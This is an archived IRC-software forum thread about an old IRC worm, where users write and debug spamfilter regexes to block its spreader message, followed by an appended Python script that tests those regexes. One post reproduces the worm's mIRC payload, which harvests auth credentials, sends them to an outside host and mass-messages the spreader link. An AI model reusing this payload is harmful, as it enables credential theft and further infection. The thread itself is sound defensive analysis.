bloodhound.exploit.6 (symantec's name for it)

These are old archives. They are kept for historic purposes only.
nexus
Posts: 14
Joined: Fri Mar 12, 2004 5:45 pm
Contact:

Post by nexus »

This was seen spreading via channel msgs recently on the net I'm on:

Code:
www.fun-pix.tk/blub_fish.jpg <------- looooooooooool
infected users always send that exact text in a channel to new users that join

I wrote a simple spamfilter that works fine, but it probably could use some tweaking ;)

Code:
spamfilter {
	regex "^www\.fun-pix\.tk/blub_fish\.jpg <------- looooooooooool";
	target channel;
	reason "Infected by Bloodhound.Exploit.6: see http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html";
	action block;
};
nexus
Posts: 14
Joined: Fri Mar 12, 2004 5:45 pm
Contact:

Post by nexus »

maybe something like this would be better, in case more urls need to be added to the regex later (saves space)

Code:
spamfilter {
        regex "^www\.fun-pix\.tk/blub_fish\.jpg <-{6} lo{11}l$";
        target channel;
        reason "Infected by Bloodhound.Exploit.6: see http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html";
        action block;
};
Syzop
UnrealIRCd head coder
Posts: 2112
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl
Contact:

Post by Syzop »

Thanks for the report, will take a look :).
Syzop
UnrealIRCd head coder
Posts: 2112
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl
Contact:

Post by Syzop »

Pretty harmless/simple/stupid thing, this is what it does:
It exploits some known IE vuln that X other trojans also use (don't care to look it up ;p)... and then a highly advanced visual basic exe gets started (*laugh*) which tries to use DDE to send the following stuff:

Code:
//write a.mrc on *:socklisten:x:sockaccept i | write a.mrc on *:sockread:i:sockread % $+ t $chr(124) tokenize 32 % $+ t $chr(124) if ($3 == :auth) url -an $!+(mitglied.lycos.de/z4p2k/a.php?d=,$encode($4,m),|,$encode($5,m)) | .load -rs a.mrc | socklisten x 6660 | server -m localhost 6660 | .timer -io 1 1 scon $!scon(0) window -h $+($chr(34),Status Window,$chr(34)) $chr(43) | .timer -io 1 1 scon $!scon(0) auth usepw q q  | .timer -io 1 1 scon $!scon(0) auth usepw 1 | scon -a .AMSG www.fun-pix.tk/blub_fish.jpg <------- looooooooooool
What is interesting is that the exe file contains the following:

Code:
@*\AD:\Stefan\visual basic codes\code99\dde-mirc.vbp
and even:

Code:
CompanyName
Delta Konzept GmbH
(which you can find with google)

Now this seems SOO stupid that it might be intentional (or part of it) ;).
Anyway.. still fun. *dinner*.
Dukat
Posts: 1083
Joined: Tue Mar 16, 2004 5:44 pm
Location: Switzerland

Post by Dukat »

nexus wrote: maybe something like this would be better, in case more urls need to be added to the regex later (saves space)

Code:
spamfilter {
        regex "^www\.fun-pix\.tk/blub_fish\.jpg <-{6} lo{11}l$";
        target channel;
        reason "Infected by Bloodhound.Exploit.6: see http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html";
        action block;
};
I think this regex is wrong (sorry for reposting in such an old thread).
But if I am right, the regex is wrong too in the CVS... :shock:

If the message is

Code:
www.fun-pix.tk/blub_fish.jpg <------- looooooooooool
Then

Code:
^www\.fun-pix\.tk/blub_fish\.jpg <-{7} lo{12}l$
would be the correct regex, wouldn't it?
aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight »

Actually, an even better regex would be:

Code:
www\.fun-pix\.tk/blub_fish\.jpg <-+ lo+l
Differences being:
  • Removed BOL and EOL assertions, to account for variants that insert whitespace/color codes/other messages before or after the string.
  • Changed fixed length of the <- and lol portions to catch any length, since variants can easily modify these with more or less '-' or 'o' characters.
I can't imagine hitting false positives, when requiring a match against an exact URL (might want to account for variants here?).
codemastr
Former UnrealIRCd head coder
Posts: 811
Joined: Sat Mar 06, 2004 8:47 pm
Location: United States
Contact:

Post by codemastr »

There is a reason we try to use ^ and $ as much as possible. Yours can have false positives. And here is an example,

<User> Someone just messaged me with, "www.fun-pix.tk/blub_fish.jpg <------- looooooooooool" I think it is a virus, what should I do?

That would be blocked since it doesn't make sure that no other text is there.
-- codemastr
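The three regexes above can be checked side by side. The following Python script is an added example and is not from the thread or from UnrealIRCd; it uses Python's `re` module as a stand-in for the regex engine behind spamfilter, and rebuilds the spreader line with the repeat counts Dukat gives (seven '-' and twelve 'o') so the counts are exact rather than eyeballed. The bystander message paraphrases codemastr's false-positive scenario.

```python
import re

# Constructed test messages. The spreader line is rebuilt from the thread's
# description (seven '-' and twelve 'o', as counted by Dukat) instead of
# being copied by eye, so the repeat counts are exact.
SPREADER_MSG = "www.fun-pix.tk/blub_fish.jpg <" + "-" * 7 + " l" + "o" * 12 + "l"

# A bystander quoting the spreader line to ask about it: codemastr's
# false-positive scenario, paraphrased.
BYSTANDER_MSG = (
    'Someone just messaged me with, "' + SPREADER_MSG + '" '
    "I think it is a virus, what should I do?"
)

# The three patterns posted in the thread, verbatim.
PATTERNS = {
    "nexus_original": r"^www\.fun-pix\.tk/blub_fish\.jpg <-{6} lo{11}l$",
    "dukat_corrected": r"^www\.fun-pix\.tk/blub_fish\.jpg <-{7} lo{12}l$",
    "aquanight_unanchored": r"www\.fun-pix\.tk/blub_fish\.jpg <-+ lo+l",
}


def count_repeats(message):
    """Return (dash_count, o_count) of the '<--- looool' tail, or None.

    This is what the fixed-width quantifiers {n} in the anchored patterns
    have to agree with; an off-by-one here means the filter never fires.
    """
    m = re.search(r"<(-+) l(o+)l", message)
    if m is None:
        return None
    return len(m.group(1)), len(m.group(2))


def would_block(pattern_name, message):
    """True if the spamfilter regex would fire on this channel message."""
    return re.search(PATTERNS[pattern_name], message) is not None


def evaluate():
    """Map each pattern to its verdict on the spreader and bystander lines.

    A good filter blocks the spreader line (true positive) and leaves the
    bystander's question alone (no false positive).
    """
    return {
        name: {
            "spreader": would_block(name, SPREADER_MSG),
            "bystander": would_block(name, BYSTANDER_MSG),
        }
        for name in PATTERNS
    }


if __name__ == "__main__":
    print("repeat counts in spreader line:", count_repeats(SPREADER_MSG))
    for name, verdict in evaluate().items():
        print(f"{name:22s} blocks spreader={verdict['spreader']!s:5s} "
              f"blocks bystander={verdict['bystander']}")
```

Running it shows the trade-off the thread is arguing about: nexus's original pattern never fires (its quantifiers are one short), Dukat's corrected pattern fires on the spreader line only, and aquanight's unanchored pattern fires on both, including the bystander's question.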
aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight »

Hmm... yeah...

Then again, users would have no need to send messages of that kind if you block the original (the user would never receive it).

So maybe keep the ^ and $ :) . I was just trying to account for variants that could insert text at the beginning or end, but then if such a variant does occur, we can tweak the spamfilter to hit that as well, I guess ;) .
Dukat
Posts: 1083
Joined: Tue Mar 16, 2004 5:44 pm
Location: Switzerland

Post by Dukat »

Well, BUT, the Regex in the CVS is ATM just wrong and won't match. "Someone" should correct it... :D
Or should I write a bug report? :wink:
Syzop
UnrealIRCd head coder
Posts: 2112
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl
Contact:

Post by Syzop »

Yeah, seems you are right... Strange nobody noticed :(.

Anyway, the page is down now so it no longer matters :p.
(perhaps a good idea to do a cleanup once in a while)

About ^ and $.. I'm always a bit unsure... coz if a user pastes it like that, eg:
<User> <spreader> go to: http://www.virus.com/infectyou.html
<User> any idea what this is??
then the other user might click on it... and we end up with another infection.
So I can understand both points, neither one is perfect :P.
Anyway, another case: a virus spreading in msg.. then the user might paste it like that in a channel... which we didn't block at all... users are always a fun factor ;).
Basically I always just hope that this stuff is kept to a minimum, since we are presumed to block all the stuff in the first place so it never reaches the user... only thing left is cross-nets (or 'old events' / logs).. like: got a virus on dalnet, then ask on an unrealnet (where you are also connected to) what it is.
Blablabla :)